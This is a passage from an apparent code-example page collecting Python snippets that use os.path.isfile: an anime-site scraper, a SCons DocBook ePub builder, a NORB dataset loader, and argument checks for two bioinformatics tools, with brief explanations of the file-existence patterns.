		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content,'lxml')
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text)
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link)
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img)
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m

Example 22

Project: Nuitka
Source File: __init__.py
View license
def DocbookEpub(env, target, source=None, *args, **kw):
    """
    A pseudo-Builder, providing a Docbook toolchain for ePub output.
    """
    import zipfile
    import shutil

    def build_open_container(target, source, env):
        """Generate the *.epub file from intermediate outputs

        Constructs the epub file according to the Open Container Format. This
        function could be replaced by a call to the SCons Zip builder if support
        was added for different compression formats for separate source nodes.
        """
        zf = zipfile.ZipFile(str(target[0]), 'w')
        mime_file = open('mimetype', 'w')
        mime_file.write('application/epub+zip')
        mime_file.close()
        zf.write(mime_file.name, compress_type = zipfile.ZIP_STORED)
        for s in source:
            if os.path.isfile(str(s)):
                head, tail = os.path.split(str(s))
                if not head:
                    continue
                s = head
            for dirpath, dirnames, filenames in os.walk(str(s)):
                for fname in filenames:
                    path = os.path.join(dirpath, fname)
                    if os.path.isfile(path):
                        zf.write(path, os.path.relpath(path, str(env.get('ZIPROOT', ''))),
                            zipfile.ZIP_DEFLATED)
        zf.close()

    def add_resources(target, source, env):
        """Add missing resources to the OEBPS directory

        Ensure all the resources in the manifest are present in the OEBPS directory.
        """
        hrefs = []
        content_file = os.path.join(source[0].abspath, 'content.opf')
        if not os.path.isfile(content_file):
            return

        if has_libxml2:
            nsmap = {'opf' : 'http://www.idpf.org/2007/opf'}
            # Read file and resolve entities
            doc = libxml2.readFile(content_file, None, 0)
            opf = doc.getRootElement()
            # Create xpath context
            xpath_context = doc.xpathNewContext()
            # Register namespaces
            for key, val in nsmap.iteritems():
                xpath_context.xpathRegisterNs(key, val)

            if hasattr(opf, 'xpathEval') and xpath_context:
                # Use the xpath context
                xpath_context.setContextNode(opf)
                items = xpath_context.xpathEval(".//opf:item")
            else:
                items = opf.findall(".//{http://www.idpf.org/2007/opf}item")

            for item in items:
                if hasattr(item, 'prop'):
                    hrefs.append(item.prop('href'))
                else:
                    hrefs.append(item.attrib['href'])

            doc.freeDoc()
            xpath_context.xpathFreeContext()
        elif has_lxml:
            from lxml import etree

            opf = etree.parse(content_file)
            # All the opf:item elements are resources
            for item in opf.xpath('//opf:item',
                    namespaces= { 'opf': 'http://www.idpf.org/2007/opf' }):
                hrefs.append(item.attrib['href'])

        for href in hrefs:
            # If the resource was not already created by DocBook XSL itself,
            # copy it into the OEBPS folder
            referenced_file = os.path.join(source[0].abspath, href)
            if not os.path.exists(referenced_file):
                shutil.copy(href, os.path.join(source[0].abspath, href))

    # Init list of targets/sources
    target, source = __extend_targets_sources(target, source)

    # Init XSL stylesheet
    __init_xsl_stylesheet(kw, env, '$DOCBOOK_DEFAULT_XSL_EPUB', ['epub','docbook.xsl'])

    # Setup builder
    __builder = __select_builder(__lxml_builder, __libxml2_builder, __xsltproc_builder)

    # Create targets
    result = []
    if not env.GetOption('clean'):
        # Ensure that the folders OEBPS and META-INF exist
        __create_output_dir('OEBPS/')
        __create_output_dir('META-INF/')
    dirs = env.Dir(['OEBPS', 'META-INF'])

    # Set the fixed base_dir
    kw['base_dir'] = 'OEBPS/'
    tocncx = __builder.__call__(env, 'toc.ncx', source[0], **kw)
    cxml = env.File('META-INF/container.xml')
    env.SideEffect(cxml, tocncx)

    env.Depends(tocncx, kw['DOCBOOK_XSL'])
    result.extend(tocncx+[cxml])

    container = env.Command(__ensure_suffix(str(target[0]), '.epub'),
        tocncx+[cxml], [add_resources, build_open_container])
    mimetype = env.File('mimetype')
    env.SideEffect(mimetype, container)

    result.extend(container)
    # Add supporting files for cleanup
    env.Clean(tocncx, dirs)

    return result
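
In build_open_container above, os.path.isfile plays two roles: it normalizes a file-typed source node to its parent directory, and it filters the os.walk results so only regular files end up in the archive. A minimal, SCons-free sketch of that second use, with illustrative names and paths:

import os
import zipfile

def zip_regular_files(root, archive_path):
    """Archive only regular files under root, mirroring the isfile guard."""
    zf = zipfile.ZipFile(archive_path, 'w')
    for dirpath, dirnames, filenames in os.walk(root):
        for fname in filenames:
            path = os.path.join(dirpath, fname)
            if os.path.isfile(path):  # skips broken symlinks, FIFOs, etc.
                zf.write(path, os.path.relpath(path, root),
                         zipfile.ZIP_DEFLATED)
    zf.close()

# usage with hypothetical paths: zip_regular_files('OEBPS', 'book.epub')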

Example 23

Project: pylearn2
Source File: new_norb.py
View license
    def __init__(self, which_norb, which_set, image_dtype='uint8'):
        """
        Reads the specified NORB dataset from a memmap cache.
        Creates this cache first, if necessary.

        Parameters
        ----------

        which_norb : str
            Valid values: 'big' or 'small'.
            Chooses between the (big) 'NORB dataset', and the 'Small NORB
            dataset'.

        which_set : str
            Valid values: 'test', 'train', or 'both'.
            Chooses between the testing set or the training set. If 'both',
            the two datasets will be stacked together (testing data in the
            first N rows, then training data).

        image_dtype : str, or numpy.dtype
            The dtype to store image data as in the memmap cache.
            Default is uint8, which is what the original NORB files use.
        """

        if which_norb not in ('big', 'small'):
            raise ValueError("Expected which_norb argument to be either 'big' "
                             "or 'small', not '%s'" % str(which_norb))

        if which_set not in ('test', 'train', 'both'):
            raise ValueError("Expected which_set argument to be either 'test' "
                             "or 'train', not '%s'." % str(which_set))

        # This will check that dtype is a legitimate dtype string.
        image_dtype = numpy.dtype(image_dtype)

        # Maps column indices of self.y to the label type it contains.
        # Names taken from http://www.cs.nyu.edu/~ylclab/data/norb-v1.0/
        self.label_index_to_name = ('category',
                                    'instance',
                                    'elevation',
                                    'azimuth',
                                    'lighting condition')

        # Big NORB has additional label types
        if which_norb == 'big':
            self.label_index_to_name = (self.label_index_to_name +
                                        ('horizontal shift',  # in pixels
                                         'vertical shift',  # in pixels
                                         'lumination change',
                                         'contrast',
                                         'object scale',
                                         'rotation'))

        # Maps label type names to the corresponding column indices of self.y
        self.label_name_to_index = {}
        for index, name in enumerate(self.label_index_to_name):
            self.label_name_to_index[name] = index

        self.label_to_value_funcs = (get_category_value,
                                     get_instance_value,
                                     get_elevation_value,
                                     get_azimuth_value,
                                     get_lighting_value)
        if which_norb == 'big':
            self.label_to_value_funcs = (self.label_to_value_funcs +
                                         (get_horizontal_shift_value,
                                          get_vertical_shift_value,
                                          get_lumination_change_value,
                                          get_contrast_change_value,
                                          get_scale_change_value,
                                          get_rotation_change_value))

        # The size of one side of the image
        image_length = 96 if which_norb == 'small' else 108

        def read_norb_files(norb_files, output):
            """
            Reads the contents of a list of norb files into a matrix.
            Data is assumed to be in row-major order.
            """

            def read_norb_file(norb_file_path, debug=False):
                """
                Returns the numbers in a single NORB file as a 1-D ndarray.

                Parameters
                ----------

                norb_file_path : str
                  A NORB file from which to read.
                  Can be uncompressed (*.mat) or compressed (*.mat.gz).

                debug : bool
                  Set to True if you want debug printfs.
                """

                if not (norb_file_path.endswith(".mat") or
                        norb_file_path.endswith(".mat.gz")):
                    raise ValueError("Expected norb_file_path to end in "
                                     "either '.mat' or '.mat.gz'. Instead "
                                     "got '%s'" % norb_file_path)

                if not os.path.isfile(norb_file_path):
                    raise IOError("Could not find NORB file '%s' in expected "
                                  "directory '%s'." %
                                  tuple(reversed(os.path.split(norb_file_path))))

                file_handle = (gzip.open(norb_file_path)
                               if norb_file_path.endswith('.mat.gz')
                               else open(norb_file_path))

                def readNums(file_handle, num_type, count):
                    """
                    Reads some numbers from a file and returns them as a
                    numpy.ndarray.

                    Parameters
                    ----------

                    file_handle : file handle
                      The file handle from which to read the numbers.

                    num_type : str, numpy.dtype
                      The dtype of the numbers.

                    count : int
                      Reads off this many numbers.
                    """
                    num_bytes = count * numpy.dtype(num_type).itemsize
                    string = file_handle.read(num_bytes)
                    return numpy.fromstring(string, dtype=num_type)

                (elem_type,
                 elem_size,
                 _num_dims,
                 shape,
                 num_elems) = read_header(file_handle, debug)
                del _num_dims

                beginning = file_handle.tell()

                result = None
                if isinstance(file_handle, (gzip.GzipFile, bz2.BZ2File)):
                    result = readNums(file_handle,
                                      elem_type,
                                      num_elems * elem_size).reshape(shape)
                else:
                    result = numpy.fromfile(file_handle,
                                            dtype=elem_type,
                                            count=num_elems).reshape(shape)

                return result  # end of read_norb_file()

            row_index = 0
            for norb_file in norb_files:
                print("copying NORB file %s" % os.path.split(norb_file)[1])
                norb_data = read_norb_file(norb_file)
                norb_data = norb_data.reshape(-1, output.shape[1])
                end_row = row_index + norb_data.shape[0]
                output[row_index:end_row, :] = norb_data
                row_index = end_row

            assert end_row == output.shape[0]  # end of read_norb_files

        if which_norb == 'small':
            training_set_size = 24300
            testing_set_size = 24300
        else:
            assert which_norb == 'big'
            num_rows_per_file = 29160
            training_set_size = num_rows_per_file * 10
            testing_set_size = num_rows_per_file * 2

        def load_images(which_norb, which_set, dtype):
            """
            Reads image data from memmap disk cache, if available. If not, then
            first builds the memmap file from the NORB files.

            Parameters
            ----------
            which_norb : str
            'big' or 'small'.

            which_set : str
            'test', 'train', or 'both'.

            dtype : numpy.dtype
            The dtype of the image memmap cache file. If a
            cache of this dtype doesn't exist, it will be created.
            """

            assert type(dtype) == numpy.dtype

            memmap_path = get_memmap_path(which_norb, 'images_%s' % str(dtype))
            row_size = 2 * (image_length ** 2)
            shape = (training_set_size + testing_set_size, row_size)

            def make_memmap():
                dat_files = get_norb_file_paths(which_norb, 'both', 'dat')

                memmap_dir = os.path.split(memmap_path)[0]
                if not os.path.isdir(memmap_dir):
                    os.mkdir(memmap_dir)

                print("Allocating memmap file %s" % memmap_path)
                writeable_memmap = numpy.memmap(filename=memmap_path,
                                                dtype=dtype,
                                                mode='w+',
                                                shape=shape)

                read_norb_files(dat_files, writeable_memmap)

            if not os.path.isfile(memmap_path):
                print("Caching images to memmap file. This "
                      "will only be done once.")
                make_memmap()

            images = numpy.memmap(filename=memmap_path,
                                  dtype=dtype,
                                  mode='r',
                                  shape=shape)
            if which_set == 'train':
                images = images[:training_set_size, :]
            elif which_set == 'test':
                images = images[training_set_size:, :]

            return images

        def load_labels(which_norb, which_set):
            """
            Reads label data (both category and info data) from memmap disk
            cache, if available. If not, then first builds the memmap file from
            the NORB files.
            """
            memmap_path = get_memmap_path(which_norb, 'labels')
            dtype = numpy.dtype('int32')
            row_size = 5 if which_norb == 'small' else 11
            shape = (training_set_size + testing_set_size, row_size)

            def make_memmap():
                cat_files, info_files = [get_norb_file_paths(which_norb,
                                                             'both',
                                                             x)
                                         for x in ('cat', 'info')]

                memmap_dir = os.path.split(memmap_path)[0]
                if not os.path.isdir(memmap_dir):
                    os.mkdir(memmap_dir)

                print("allocating labels' memmap...")
                writeable_memmap = numpy.memmap(filename=memmap_path,
                                                dtype=dtype,
                                                mode='w+',
                                                shape=shape)
                print("... done.")

                cat_memmap = writeable_memmap[:, :1]   # 1st column
                info_memmap = writeable_memmap[:, 1:]  # remaining columns

                for norb_files, memmap in safe_zip((cat_files, info_files),
                                                   (cat_memmap, info_memmap)):
                    read_norb_files(norb_files, memmap)

            if not os.path.isfile(memmap_path):
                print("Caching images to memmap file %s.\n"
                      "This will only be done once." % memmap_path)
                make_memmap()

            labels = numpy.memmap(filename=memmap_path,
                                  dtype=dtype,
                                  mode='r',
                                  shape=shape)

            if which_set == 'train':
                labels = labels[:training_set_size, :]
            elif which_set == 'test':
                labels = labels[training_set_size:, :]

            return labels

        def get_norb_dir(which_norb):
            datasets_dir = os.getenv('PYLEARN2_DATA_PATH')
            if datasets_dir is None:
                raise RuntimeError("Please set the 'PYLEARN2_DATA_PATH' "
                                   "environment variable to tell pylearn2 "
                                   "where the datasets are.")

            if not os.path.isdir(datasets_dir):
                raise IOError("The PYLEARN2_DATA_PATH directory (%s) "
                              "doesn't exist." % datasets_dir)

            return os.path.join(datasets_dir,
                                'norb' if which_norb == 'big'
                                else 'norb_small')

        norb_dir = get_norb_dir(which_norb)

        def get_memmap_path(which_norb, file_basename):
            assert which_norb in ('big', 'small')
            assert (file_basename == 'labels' or
                    file_basename.startswith('images')), file_basename

            memmap_dir = os.path.join(norb_dir, 'memmaps_of_original')
            return os.path.join(memmap_dir, "%s.npy" % file_basename)

        def get_norb_file_paths(which_norb, which_set, norb_file_type):
            """
            Returns a list of paths for a given norb file type.

            For example,

                get_norb_file_paths('big', 'test', 'cat')

            Will return the category label files ('cat') for the big NORB
            dataset's test set.
            """

            assert which_set in ('train', 'test', 'both')

            if which_set == 'both':
                return (get_norb_file_paths(which_norb,
                                            'train',
                                            norb_file_type) +
                        get_norb_file_paths(which_norb,
                                            'test',
                                            norb_file_type))

            norb_file_types = ('cat', 'dat', 'info')
            if norb_file_type not in norb_file_types:
                raise ValueError("Expected norb_file_type to be one of %s, "
                                 "but it was '%s'" % (str(norb_file_types),
                                                      norb_file_type))

            instance_list = '01235' if which_set == 'test' else '46789'

            if which_norb == 'small':
                templates = ['smallnorb-5x%sx9x18x6x2x96x96-%sing-%%s.mat' %
                             (instance_list, which_set)]
            else:
                numbers = range(1, 3 if which_set == 'test' else 11)
                templates = ['norb-5x%sx9x18x6x2x108x108-%sing-%02d-%%s.mat' %
                             (instance_list, which_set, n) for n in numbers]

            original_files_dir = os.path.join(norb_dir, 'original')
            return [os.path.join(original_files_dir, t % norb_file_type)
                    for t in templates]

        def make_view_converter(which_norb, which_set):
            image_length = 96 if which_norb == 'small' else 108
            datum_shape = (2,  # number of images per stereo pair
                           image_length,  # image height
                           image_length,  # image width
                           1)  # number of channels
            axes = ('b', 's', 0, 1, 'c')
            return StereoViewConverter(datum_shape, axes)

        images = load_images(which_norb, which_set, image_dtype)
        labels = load_labels(which_norb, which_set)
        view_converter = make_view_converter(which_norb, which_set)

        super(NORB, self).__init__(X=images,
                                   y=labels,
                                   y_labels=numpy.max(labels) + 1,
                                   view_converter=view_converter)

        # Needed for pickling / unpickling.
        # These are set during pickling, by __getstate__()
        self.X_memmap_info = None
        self.y_memmap_info = None
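
The NORB loader above uses os.path.isfile to build a create-once disk cache: load_images and load_labels write the expensive memmap file only when it does not exist yet, then always reopen it read-only. A condensed sketch of that pattern, assuming a hypothetical fill callback in the role of read_norb_files:

import os
import numpy

def cached_memmap(path, shape, dtype, fill):
    """Open a read-only memmap at path, building it first if absent.

    fill(writeable) is a hypothetical callback that populates the
    freshly allocated cache, as read_norb_files does above.
    """
    if not os.path.isfile(path):  # the expensive build runs exactly once
        memmap_dir = os.path.dirname(path)
        if memmap_dir and not os.path.isdir(memmap_dir):
            os.makedirs(memmap_dir)
        writeable = numpy.memmap(path, dtype=dtype, mode='w+', shape=shape)
        fill(writeable)
        writeable.flush()
    return numpy.memmap(path, dtype=dtype, mode='r', shape=shape)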

Example 25

View license
def parse_arguments():
    """ Parse the comand line arguments

        read the arguments and set sensible
        default values for the program
    """
    parser = OptionParser()
    parser.add_option('-v', '--debug',
                      action="store_true", dest='debug',
                      help="Print debug messages")
    parser.add_option('-q', '--silent', action="store_false",
                      dest='verbose', help="Run Silently")
    parser.add_option('-i', '--vcf',
                      dest='vcf_input', help="VCF input file")
    parser.add_option('-c', '--chromosome',
                      dest='chromosome', help="Chromosome")
    parser.add_option('-l', '--log-fire', dest='log_file',
                      help="Log file for the pipeline process")
    parser.add_option('--maf', dest='maf',
                      help='Minor allele-frequency filter')
    parser.add_option('--hwe', dest='hwe',
                      help="Hardy-Weinberg Equillibrium filter proportion")
    parser.add_option('--remove-missing', dest="remove_missing",
                      help="Remove missing genotypes")
    parser.add_option('--config-file', dest="config_file",
                      help="Config file")
    parser.add_option('--phased-vcf', action="store_true",
                      dest="phased_vcf", help="Phased vcf file")
    parser.add_option('--population', dest="population",
                      help="Population Code ")
    parser.add_option('--imputation', action="store_true",
                      dest="imputation", help="Imputation")
    parser.add_option('--full-process', action="store_true",
                      dest="full_process", help="Run Entire Process")
    parser.add_option('--gzvcf', action="store_true",
                      dest="vcf_gz", help="VCF input is in GZ file (optional)")
    parser.add_option('--TajimaD', dest='tajimas_d',
                      help="Output Tajima's D statistic in bins of size (bp)")
    parser.add_option('--fay-Window-Width', dest='fayandWuWindowWidth',
                      help="Sliding window width for Fay and Wu's H (kb)")
    parser.add_option('--fay-Window-Jump', dest="fayandWuWindowJump",
                      help=("Window Jump for Fay and Wus ( if fay-Window-Width"
                            " = fay-Window-Jump non-overlapping windows "
                            "are used (kb)"))
    parser.add_option('--no-clean-up', dest="no_clean_up", action="store_true",
                      help="Do not clean up intermediate datafiles")
    parser.add_option('--impute-split-size', dest='impute_split_size',
                      help="impute2 split size (Mb)")
    parser.add_option('--ehh-window-size', dest="multi_window_size",
                      help="Multicore window size (Mp)")
    parser.add_option('--ehh-overlap', dest="ehh_overlap",
                      help="EHH window overlap (Mb)")
    parser.add_option('--daf', dest='daf',
                      help="Derived Allele Frequency filter proportion")
    parser.add_option('--big-gap', dest="big_gap",
                      help=("Gap size for not calculating iHH if "
                            "core SNP spans this gap (kb)"))
    parser.add_option('--small-gap', dest='small_gap',
                      help=("Gap size for applying a penalty to "
                            "the area calculated by iHH (kb)"))
    parser.add_option('--small-gap-penalty', dest="small_gap_penalty",
                      help=("Penalty multiplier for intergration steps"
                            "in iHH see manual for formula, usually the "
                            "same as small-gap"))
    parser.add_option('--cores', dest='cores',
                      help="Override cores avaliable setting")
    parser.add_option('--no-ihs', dest='no_ihs', action="store_true",
                      help='Disable iHS and iHH calculation')
    parser.add_option('--haps', dest='haps',
                        help="Shapeit haps file")
    parser.add_option('--sample', dest='sample',
                        help='Corresponding sample file to accompany haps')
    parser.add_option('--beagle',dest='beagle',action='store_true',
                      help="Use beagle to phase")
    parser.add_option('--no-gmap',dest="no_genetic_map",action="store_true",
                      help="Do not use a genetic map for the analysis")
    parser.add_option('--physical-ihs', dest="physical_ihs", action="store_true",
                      help="Use physical map for calculating iHS")
    parser.add_option("--no-plots" , dest="no_plots", action="store_true",
                      help="Do not create rudimentary plots")
    parser.add_option('--version', dest = "ver", action="store_true",
                      help="Print version info")
    (options, args) = parser.parse_args()
    if(options.verbose is not None):
        if(options.debug):
            logger.setLevel(logging.DEBUG)
        else:
            logger.setLevel(logging.ERROR)
    if(options.ver is True): 
        print "Version: {0}".format(__version__)
        sys.exit(1)        

    # Obligatory arguments
    assert options.vcf_input or (options.haps and options.sample), \
        "No VCF or haps/sample file has been specified as input"
    assert options.chromosome is not None, \
        "No chromosome has been specified to the script"
    assert options.population is not None, \
        "Population code has not been specified."
    assert options.config_file is not None, \
        "Config file has not been specified."
    if(options.haps and options.sample):
        assert os.path.isfile(options.haps), \
                "Cannot locate haps file path = {0}".format(options.haps)
        assert os.path.isfile(options.sample), \
                "Cannot locate sample file path = {0}".format(options.sample)
    elif(options.vcf_input):
        assert os.path.isfile(options.vcf_input), \
                "Cannot locate vcf input file path = {0}".format(options.vcf_input) 
    if(options.fayandWuWindowJump is None):
        options.fayandWuWindowJump = str(5000)
    else:
        options.fayandWuWindowJump = str(
            int(float(options.fayandWuWindowJump) * 1e3))
    if(options.fayandWuWindowWidth is None):
        options.fayandWuWindowWidth = str(5000)
    else:
        options.fayandWuWindowWidth = str(
            int(float(options.fayandWuWindowWidth) * 1e3))
    if(options.no_clean_up is None):
        options.no_clean_up = False
    if(options.tajimas_d is None):
        options.tajimas_d = str(5000)
    else:
        options.tajimas_d = str(
            int(float(options.tajimas_d) * 1e3))
    if(options.imputation is None):
        options.imputation = False
    if(options.hwe is None):
        options.hwe = str(0.0001)
    if(options.maf is None):
        options.maf = str(0.01)
    if(options.daf is None):
        options.daf = str(0.00)
    if(options.remove_missing is None):
        options.remove_missing = str(0.99)
    if (options.phased_vcf is None):
        options.phased_vcf = False
    if (options.full_process is None):
        options.full_process = False
    if (options.vcf_gz is None):
        options.vcf_gz = False
    if (options.no_ihs is None):
        options.no_ihs = False
    if(options.log_file is None):
        options.log_file = options.population + \
            options.chromosome + "_selection_pipeline.log"
    if (options.impute_split_size is None):
        options.impute_split_size = str(5000000)
    else:
        options.impute_split_size = str(
            int(float(options.impute_split_size) * 1e6))
    if (options.multi_window_size is None):
        options.multi_window_size = str(int(5*1e6))
    else:
        options.multi_window_size = str(
            int(float(options.multi_window_size) * 1e6))
    if (options.ehh_overlap is None):
        options.ehh_overlap = str(int(2*1e6))
    else:
        options.ehh_overlap = str(
            int(float(options.ehh_overlap) * 1e6))
    if (options.big_gap is None):
        options.big_gap = str(0)
    else:
        options.big_gap = str(
            int(float(options.big_gap) * 1e3))
    if (options.small_gap is None):
        options.small_gap = str(0)
    else:
        options.small_gap = str(
            int(float(options.small_gap) * 1e3))
    if (options.small_gap_penalty is None):
        options.small_gap_penalty = str(0)
    else:
        options.small_gap_penalty = str(
            int(float(options.small_gap_penalty) * 1e3))
    if (options.no_genetic_map):
        # Must set beagle to true because shapeit will not
        # work without a genetic map
        options.beagle = True
    if (options.no_plots is None):
        options.no_plots = False
    if (options.physical_ihs is None):
        options.physical_ihs = False
    return options
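
parse_arguments validates each input path with assert os.path.isfile(...), which fails fast with a readable message. One caveat worth a sketch: assert statements are stripped under python -O, so an explicit check that raises is more robust for command line input. The helper below is illustrative, not part of the pipeline:

import os

def require_file(path, label):
    """Fail fast if path is missing or is not a regular file.

    Unlike an assert, this check still runs under python -O.
    """
    if path is None:
        raise ValueError("%s has not been specified" % label)
    if not os.path.isfile(path):
        raise IOError("Cannot locate %s, path = %s" % (label, path))
    return path

# usage: require_file(options.vcf_input, "vcf input file")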

Example 26

Project: tetoolkit
Source File: ReadInputs.py
View license
def read_opts(parser):
    ''' object parser contains parsed options '''
    
    args = parser.parse_args()
    
    #treatment files
    for i in range(len(args.tfiles)) :
        if not os.path.isfile(args.tfiles[i]) :
            logging.error("No such file: %s !\n" % (args.tfiles[i]))
            sys.exit(1)
        
    if not os.path.isfile(args.tinputs[0]) :
        logging.error("No such file: %s !\n" % (args.tinputs[0]))
        sys.exit(1)
    
    #control files 
    if args.cfiles is not None :
        for i in range(len(args.cfiles)) :
            if not os.path.isfile(args.cfiles[i]) :
                logging.error("No such file: %s !\n" % (args.cfiles[i]))
                sys.exit(1)
            else :
                if args.cinputs is None :
                    logging.error("No input for control samples!\n")
                    sys.exit(1)
    else :
        args.cinputs = None
        
    if args.TEmode != 'multi' and args.TEmode != 'uniq' :
        logging.error("Does not support TE mode : %s !\n" % (args.TEmode))
        sys.exit(1)
    # file parser
    if args.format == "BAM" :
        args.parser = BAMFile
#    elif args.format == "SAM" :
#    	args.parser = SAMFile
    elif args.format == "BED" :
        args.parser = BEDFile
    else :
        logging.error("Does not support such file format: %s !\n" %(args.format))
        sys.exit(1)
    #window size
    if args.wsize < 0 :
        logging.error("window size should be greater than 0, default value %d was used\n" % (WIN_SIZE))
        args.wsize = WIN_SIZE 
    
    #step size
    if args.step < 0 :
        logging.error("step size should be greater than 0, default value  %d was used\n" % (STEP))
        args.step = STEP
        
    if args.step > args.wsize :
        logging.error("step should be smaller than window size,default value %d was used\n" % (STEP))
        args.step = STEP
    
    #cutoff
    if args.minread < 0 :
        args.minread = 0
    if args.minread > 20 :
        args.minread = 20
    
    #species
    if args.species[0] not in ['hg','mm','dm','tm'] :
        logging.error("species not found %s \n" %(args.species[0]))
        parser.print_help()
        sys.exit(1)
        
    args.gsize = efgsize[args.species[0]]
    args.gsize = float(args.gsize)     
    if args.species[0] == 'hg' :
        args.chrom = HS_CHROM
        args.species[0] = 'hg19'
       
        
    elif args.species[0] == 'mm' :
        args.chrom = MM_CHROM
        args.species[0] = 'mm9'
    elif args.species[0] == 'dm' :
        args.chrom = DM_CHROM
        args.species[0] = 'dm3'
    elif args.species[0] == 'tm' :
        args.chrom = TM_CHROM
    
    #normalization
    if args.norm not in ['sd','bc'] :
        logging.error("normalization method %s not supported\n" % (args.norm))
        parser.print_help()
        sys.exit(1)
    
    #p-value
    if args.pval < 0 or args.pval > 1 :
        logging.error("p-value should be a value in [0,1]\n")
        sys.exit(1)            
    args.log_pvalue = log(args.pval,10)*-10
    #gap size
    if args.gap < 0 :
        logging.error("gap size should be greater than 0, default value was used\n")
        args.gap = GAP
    
    #fragment size
    if args.fragsize < 0 :
        logging.error("fragment size should be greater than 0, default value %d was used\n" % (FRAG_SIZE))
        args.fragsize = FRAG_SIZE
    
    #output filenames
    args.dfbs = args.prj_name+"_dfbs"
    
    # logging object
    logging.basicConfig(level=(4-args.verbose)*10,
                        format='%(levelname)-5s @ %(asctime)s: %(message)s ',
                        datefmt='%a, %d %b %Y %H:%M:%S',
                        stream=sys.stderr,
                        filemode="w"
                        )
    
    args.error   = logging.critical        # function alias
    args.warn    = logging.warning
    args.debug   = logging.debug
    args.info    = logging.info
    
    cinput = None
